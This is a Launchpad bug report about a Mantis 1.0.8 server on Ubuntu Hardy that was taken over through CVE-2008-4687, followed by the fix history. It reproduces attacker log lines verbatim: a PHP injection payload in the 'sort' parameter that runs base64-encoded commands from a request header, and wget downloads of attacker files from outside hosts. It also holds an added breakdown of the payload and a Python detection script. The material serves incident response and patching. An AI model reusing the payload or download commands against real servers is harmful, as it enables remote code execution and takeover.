mantis1.0.8-4 (ubuntu 8.04) vulnerable to remote exploit

Bug #481631 reported by Markus Gonaus
Affects            Status        Importance   Assigned to   Milestone
mantis             Fix Released  Unknown
mantis (Ubuntu)    Fix Released  High         Unassigned
  Hardy            Fix Released  High         Unassigned
  Intrepid         Invalid       Undecided    Unassigned

Bug Description

Binary package hint: mantis

My system has been taken over.
It looks like it is a vulnerability already reported a year ago.

It seems the following log lines indicate how a file got deployed in /tmp:

206.217.198.78 - - [09/Nov/2009:23:25:53 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:57 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:26:17 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23

<code>
error.log
[Mon Nov 09 23:25:05 2009] [error] [client 206.183.9.211] File does
not exist: /var/www/favicon.ico
--23:26:18-- http://g0lias.tripod.com/dc.txt
           => `dc.txt'
Resolving g0lias.tripod.com... 209.202.252.50
Connecting to g0lias.tripod.com|209.202.252.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]

    0K 100%
56.32 MB/s

23:26:19 (56.32 MB/s) - `dc.txt' saved [759/759]

[Mon Nov 09 23:42:55 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/proxycheck.txt
[Mon Nov 09 23:43:28 2009] [error] [client 193.109.122.17] request
failed: error reading the headers
--00:05:46-- http://lordmax.host.sk/ddos.jpg
           => `ddos.jpg'
Resolving lordmax.host.sk... 62.168.109.150
Connecting to lordmax.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 204,429 (200K) [image/jpeg]

    0K .......... .......... .......... .......... .......... 25%
1.06 MB/s
   50K .......... .......... .......... .......... .......... 50%
3.02 MB/s
  100K .......... .......... .......... .......... .......... 75%
3.29 MB/s
  150K .......... .......... .......... .......... ......... 100%
3.39 MB/s

00:05:47 (2.13 MB/s) - `ddos.jpg' saved [204429/204429]

./start.sh: 1: /#bin/bash: not found
[Tue Nov 10 00:06:43 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/proxycheck.txt
[Tue Nov 10 00:08:06 2009] [error] [client 212.174.153.69] client
sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):
/w00tw00t.at.ISC.SANS.DFind:)
[Tue Nov 10 00:09:19 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/proxycheck.txt

access.log
127.0.0.1 - - [09/Nov/2009:23:19:32 +0100] "OPTIONS * HTTP/1.0" 200 -
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
(internal dummy connection)"
96.57.77.197 - - [09/Nov/2009:23:19:47 +0100] "GET
/w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 353 "-" "-"
206.183.9.211 - - [09/Nov/2009:23:24:48 +0100] "GET
/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9
HTTP/1.1" 200 5689
"http://us.mg4.mail.yahoo.com/dc/blank.html?bn=211.6&.intl=us&.lang=en-US"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:24:52 +0100] "GET
/mantis/css/default.css HTTP/1.1" 200 5120
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:24:53 +0100] "GET
/mantis/javascript/common.js HTTP/1.1" 200 3186
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:00 +0100] "GET
/mantis/images/mantis_logo_button.gif HTTP/1.1" 200 2413
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:00 +0100] "GET
/mantis/images/mantis_logo.gif HTTP/1.1" 200 5202
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:02 +0100] "GET /favicon.ico
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:05 +0100] "GET /favicon.ico
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:42 +0100] "POST
/mantis/account_update.php HTTP/1.1" 200 3482
"http://85.25.20.217/mantis/verify.php?id=6&confirm_hash=afce2470012023a8b8cb603c16afd8c9"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/2009:23:25:45 +0100] "GET
/mantis/account_page.php HTTP/1.1" 200 5323 "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102
(CK-Finbu.com) Firefox/3.5.5"
206.217.198.78 - - [09/Nov/2009:23:25:52 +0100] "GET
/mantis/manage_proj_page.php HTTP/1.0" 200 3825 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:53 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:57 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:26:17 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3302 "-" "-"
206.183.9.211 - - [09/Nov/2009:23:37:14 +0100] "GET
/mantis/account_page.php HTTP/1.1" 200 5323 "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102
(CK-Finbu.com) Firefox/3.5.5"
127.0.0.1 - - [09/Nov/2009:23:39:16 +0100] "OPTIONS * HTTP/1.0" 200 -
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
(internal dummy connection)"
127.0.0.1 - - [09/Nov/2009:23:40:28 +0100] "OPTIONS * HTTP/1.0" 200 -
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
(internal dummy connection)"
194.109.21.230 - - [09/Nov/2009:23:42:55 +0100] "CONNECT
194.109.153.5:11111 HTTP/1.0" 302 348 "-" "-"
194.109.21.230 - - [09/Nov/2009:23:42:55 +0100] "GET
http://194.109.153.3/proxycheck.txt HTTP/1.0" 404 330 "-"
"BOPM/3.1.3"
194.109.21.230 - - [09/Nov/2009:23:42:56 +0100] "POST
http://194.109.153.5:11111/ HTTP/1.0" 302 348 "-" "-"
193.109.122.38 - - [09/Nov/2009:23:43:10 +0100] "CONNECT
72.51.18.254:6677 HTTP/1.0" 302 344 "-" "pxyscand/2.1"
193.109.122.17 - - [09/Nov/2009:23:42:58 +0100] "GET
http://72.51.18.254:6677 HTTP/1.0" 400 345 "-" "-"

</code>
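The request lines above already tell most of the story, and that reading is worth making explicit. The sort value begins with ']);} which, in order, closes a single-quoted string, an array index, a function call, a statement and a block, so the parameter was being pasted into PHP source that the server then executed; everything after it is attacker PHP, and the trailing %23 (#) comments out whatever of the original code followed. The command to run is not in the URL at all: passthru(base64_decode($_SERVER[HTTP_CMD])) takes it, base64-encoded, from a Cmd: request header, so access.log records the same query string three times while the commands differ (the response sizes 3336, 3295 and 3302 vary with the command output). Under mod_php the stderr of a spawned process is Apache's error.log, which is why wget's progress banner for dc.txt appears there at 23:26:18, one second after the third injected request at 23:26:17. These are inferences from the logs as posted, not from Mantis source.

The following script is an added triage example, not part of the bug report or of Mantis. It parses combined-format access log lines, flags query parameters that carry PHP source (breakout prefix, exec-family calls, superglobals, trailing comment), and correlates wget banners in error.log with the injection timestamps. The two log excerpts are constructed to match the shape of the logs above and trimmed; everything is standard library.

```python
"""Triage of PHP code injected through a query parameter (added example)."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed samples: shape copied from the access.log / error.log in the report,
# one benign request added so the detector sees a negative too.
ACCESS_LOG = r'''
206.183.9.211 - - [09/Nov/2009:23:25:45 +0100] "GET /mantis/account_page.php HTTP/1.1" 200 5323 "-" "Mozilla/5.0"
206.217.198.78 - - [09/Nov/2009:23:25:52 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 3825 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:25:53 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/2009:23:26:17 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3302 "-" "-"
'''
ERROR_LOG = r"""
[Mon Nov 09 23:25:05 2009] [error] [client 206.183.9.211] File does not exist: /var/www/favicon.ico
--23:26:18-- http://g0lias.tripod.com/dc.txt
           => `dc.txt'
23:26:19 (56.32 MB/s) - `dc.txt' saved [759/759]
--00:05:46-- http://lordmax.host.sk/ddos.jpg
00:05:47 (2.13 MB/s) - `ddos.jpg' saved [204429/204429]
./start.sh: 1: /#bin/bash: not found
"""

# Apache combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Indicators that a parameter value is PHP source rather than data.
BREAKOUT = re.compile(r"""^['"]\s*\]\s*\)\s*;\s*\}""")      # closes '…'], call, stmt, block
PHP_EXEC = re.compile(r"\b(passthru|system|exec|shell_exec|popen|proc_open|eval|assert|create_function)\s*\(", re.I)
PHP_DECODE = re.compile(r"\bbase64_decode\s*\(", re.I)
SUPERGLOBAL = re.compile(r"\$_(SERVER|GET|POST|REQUEST|COOKIE)\b")
TAIL_COMMENT = re.compile(r"(#|//|/\*)\s*$")                # comments out the rest of the line
WGET_RE = re.compile(r'^--(?P<hms>\d\d:\d\d:\d\d)--\s+(?P<url>\S+)')


def parse_query(target):
    """Split path?query into (path, {name: decoded value}); splits on & only."""
    path, _, query = target.partition('?')
    params = {}
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            params[unquote(name)] = unquote(value)
    return path, params


def indicators(value):
    """Names of the indicators present in one decoded parameter value."""
    checks = [('breakout', BREAKOUT), ('exec', PHP_EXEC), ('decode', PHP_DECODE),
              ('superglobal', SUPERGLOBAL), ('tail_comment', TAIL_COMMENT)]
    return [name for name, rx in checks if rx.search(value)]


def find_injections(log_text):
    """Requests whose parameters look like injected PHP, with timestamp and size."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = parse_query(m['target'])
        for name, value in params.items():
            hits = indicators(value)
            # A breakout prefix is decisive; otherwise require code plus a data source.
            if 'breakout' in hits or ('exec' in hits and 'superglobal' in hits):
                findings.append({
                    'ip': m['ip'], 'path': path, 'param': name,
                    'time': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
                    'status': int(m['status']),
                    'bytes': int(m['size']) if m['size'].isdigit() else 0,
                    'indicators': hits,
                })
    return findings


def fetches_after(findings, error_log, window_s=120):
    """wget banners in error.log within window_s after the nearest injection.

    Banners carry only a time of day, so the date is taken from the injection;
    an earlier time of day is treated as the following day."""
    out = []
    for line in error_log.strip().splitlines():
        m = WGET_RE.match(line)
        if not m:
            continue
        h, mi, s = map(int, m['hms'].split(':'))
        candidates = []
        for f in findings:
            t_inj = f['time']
            t_fetch = t_inj.replace(hour=h, minute=mi, second=s)
            if t_fetch < t_inj:
                t_fetch += timedelta(days=1)
            delta = int((t_fetch - t_inj).total_seconds())
            if delta <= window_s:
                candidates.append((delta, t_inj))
        if candidates:
            delta, t_inj = min(candidates)
            out.append((m['url'], t_inj.isoformat(), delta))
    return out


if __name__ == '__main__':
    found = find_injections(ACCESS_LOG)
    for f in found:
        print(f"{f['time']:%H:%M:%S} {f['ip']} {f['path']} param={f['param']} "
              f"status={f['status']} bytes={f['bytes']} {','.join(f['indicators'])}")
    for url, when, delta in fetches_after(found, ERROR_LOG):
        print(f"fetch {url} {delta}s after injection at {when}")
```

Run against the real logs, the missing piece is the Cmd header: a standard access log never shows it, so recovering the executed commands needs a full request capture (mod_security audit log, a proxy, or a packet trace) or the downloaded artifacts themselves.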

CVE References

CVE-2008-4687
Kees Cook (kees)
Changed in mantis (Ubuntu):
status: New → Triaged
importance: Undecided → High
visibility: private → public
Revision history for this message
Artur Rona (ari-tczew) wrote :
Micah Gersten (micahg) wrote :

I'll prepare the debdiff tonight.

Changed in mantis (Ubuntu):
assignee: nobody → Micah Gersten (micahg)
status: Triaged → In Progress
Artur Rona (ari-tczew) wrote :

Micah, please check whether other releases are affected by this bug.

Micah Gersten (micahg) wrote :

Hardy and Intrepid are affected and I'll prepare debdiffs for both. I believe this is no longer supported in dapper and I don't know if it's affected or not.

Micah Gersten (micahg) wrote :

I take it back, I based my previous comment on the versions, but it seems that the debian maintainer already patched the Intrepid version. I'm test building the hardy package now and will attach the debdiff after I confirm it builds.

Artur Rona (ari-tczew) wrote :

A task needs to be opened on hardy. Could someone from MOTU please do it.

Artur Rona (ari-tczew) wrote :

Fixed in other releases, only hardy is affected.

Changed in mantis (Ubuntu):
assignee: Micah Gersten (micahg) → nobody
status: In Progress → Fix Released
Changed in mantis (Ubuntu Hardy):
assignee: nobody → Micah Gersten (micahg)
Micah Gersten (micahg) wrote :

Debdiff attached. I don't have the USN number, so I left it out.

Test build here:
https://launchpad.net/~micahg/+archive/sru-test/+packages

Micah Gersten (micahg) wrote :

Updating status per Security Updates wiki page.

Changed in mantis (Ubuntu Hardy):
importance: Undecided → High
status: New → Confirmed
Micah Gersten (micahg) wrote :

I was wondering if the other CVEs should be done at the same time, or is this one enough? I won't have time to do the others until later this week or next weekend.

Artur Rona (ari-tczew) wrote :

I think that this one is enough. Sponsors, just upload.

Kees Cook (kees) wrote :

Thanks for the patch! This is building in the security queue now.

Changed in mantis (Ubuntu Intrepid):
status: New → Invalid
Changed in mantis (Ubuntu Hardy):
assignee: Micah Gersten (micahg) → nobody
status: Confirmed → Fix Committed
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package mantis - 1.0.8-4ubuntu0.1

---------------
mantis (1.0.8-4ubuntu0.1) hardy-security; urgency=low

  * Fix CVE-2008-4687 - Closes (LP: #481631)
    - add debian/patches/06-fix-cve-2008-4687.dpatch
    - update debian/patches/00list
 -- Micah Gersten <email address hidden> Fri, 01 Jan 2010 03:12:52 -0600

Changed in mantis (Ubuntu Hardy):
status: Fix Committed → Fix Released
Changed in mantis:
status: Unknown → Fix Released
This report contains public security information; everyone can see it.